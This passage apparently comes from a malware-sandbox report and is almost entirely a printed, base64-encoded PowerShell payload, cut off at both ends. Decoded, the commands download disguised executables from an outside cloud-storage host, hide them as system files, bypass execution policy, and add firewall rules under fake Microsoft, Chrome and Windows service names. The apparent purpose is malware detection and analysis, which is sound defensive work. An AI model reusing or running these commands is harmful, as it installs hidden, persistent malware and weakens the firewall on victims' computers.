AFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiADsAIABVAHIAbAA9ACIAaAB0AHQAcABzADoALwAvAHMAagBjADEALgB2AHUAbAB0AHIAbwBiAGoAZQBjAHQAcwAuAGMAbwBtAC8AYwBmAGMAYgA2ADkAZgBmAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoACQBAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgB9AAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlACAAaQBuACAAJABmAGkAbABlAHMAVABvAEMAaABlAGMAawApACAAewAKACAAIAAgACAAaQBmACAAKAAtAE4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQAuAFAAYQB0AGgAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQApACAAewAKACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAGYAaQBsAGUALgBVAHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgBpAGwAZQAuAFAAYQB0AGgACgAgACAAIAAgAH0ACgAgACAAIAAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZgBpAGwAZQAuAFAAYQB0AGgAKQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAfQAKAAoAJABhAGQAZABpAHQAaQBvAG4AYQBsAEYAaQBsAGUAcwBUAG8ASABpAGQAZQAgAD0AIABAACgACgAJACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAbQB5AHMAdAAtAGwAYQB1AG4AYwBoAGUAcgAtAGEAbQBkADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGYAaQBsAGUAUABhAHQAaAAgAGkAbgAgACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAGkAbABlAHMAVABvAEgAaQBkAGUAKQAgAHsACgAgACAAIAAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAUABhAHQAaAAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgAKACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAG8AbABkAGUAcgBzAFQAbwBIAGkAZABlACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAFAAcgBpAHYAYQB0AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AYgBpAG4AIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AbgBvAGQAZQAiAAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlAFAAYQB0AGgAIABpAG4AIAAkAGEAZABkAGkAdABpAG8AbgBhAGwARgBvAGwAZABlAHIAcwBUAG8ASABpAGQAZQApACAAewAKACAAIAAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgA=
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:5288
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:6296
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBHAHIAbwB1AHAAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAEUAVQBMAEEAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIABFAFUATABBACIAIAAtAEcAcgBvAHUAcAAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAARQBVAEwAQQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIgAgAC0ARwByAG8AdQBwACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFQAdQBuAGkAbgBnACAAUwBlAHIAdgBpAGMAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAG0AeQBzAHQALQBsAGEAdQBuAGMAaABlAHIALQBhAG0AZAA2ADQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAG0AeQBzAHQALQBsAGEAdQBuAGMAaABlAHIALQBhAG0AZAA2ADQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAUwB5AG4AYwBoAHIAbwBuAGkAegBhAHQAaQBvAG4AIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFMAeQBuAGMAaAByAG8AbgBpAHoAYQB0AGkAbwBuACAAUwBlAHIAdgBpAGMAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdABjAHAAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdABjAHAAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAG0AeQBzAHQAXwBsAGEAdQBuAGMAaABlAHIAXwB1AGQAcAAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAG0AeQBzAHQAXwBsAGEAdQBuAGMAaABlAHIAXwB1AGQAcAAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwALgBtAHkAcwB0AGUAcgBpAHUAbQAtAGIAaQBuAFwAbQB5AHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAFAAdQBiAGwAaQBjACAALQBQAHIAbwB0AG8AYwBvAGwAIABVAEQAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AC4AZQB4AGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AC4AZQB4AGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByA